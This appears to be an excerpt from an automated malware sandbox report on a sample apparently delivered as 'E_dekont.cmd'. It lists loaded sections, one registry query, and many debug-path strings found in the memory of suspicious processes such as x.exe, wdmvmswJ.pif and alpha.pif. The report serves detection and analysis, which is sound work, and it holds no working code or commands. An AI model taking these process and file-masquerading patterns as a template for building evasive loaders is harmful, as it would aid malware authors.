Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: E_dekont.cmd

Static file information: File size 1052051 > 1048576

Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: wdmvmswJ.pif, 0000000C.00000003.1554599936.0000000023230000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1530165716.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000001.1581602644.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000000.1581239901.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: GoogleUpdate_unsigned.pdb source: alg.exe, 00000010.00000003.2967850181.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdb source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: wdmvmswJ.pif, 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.0000000002932000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B3F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B10000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002931000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2227816265.000000001E790000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: wdmvmswJ.pif, 0000000C.00000003.2209705208.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdb source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
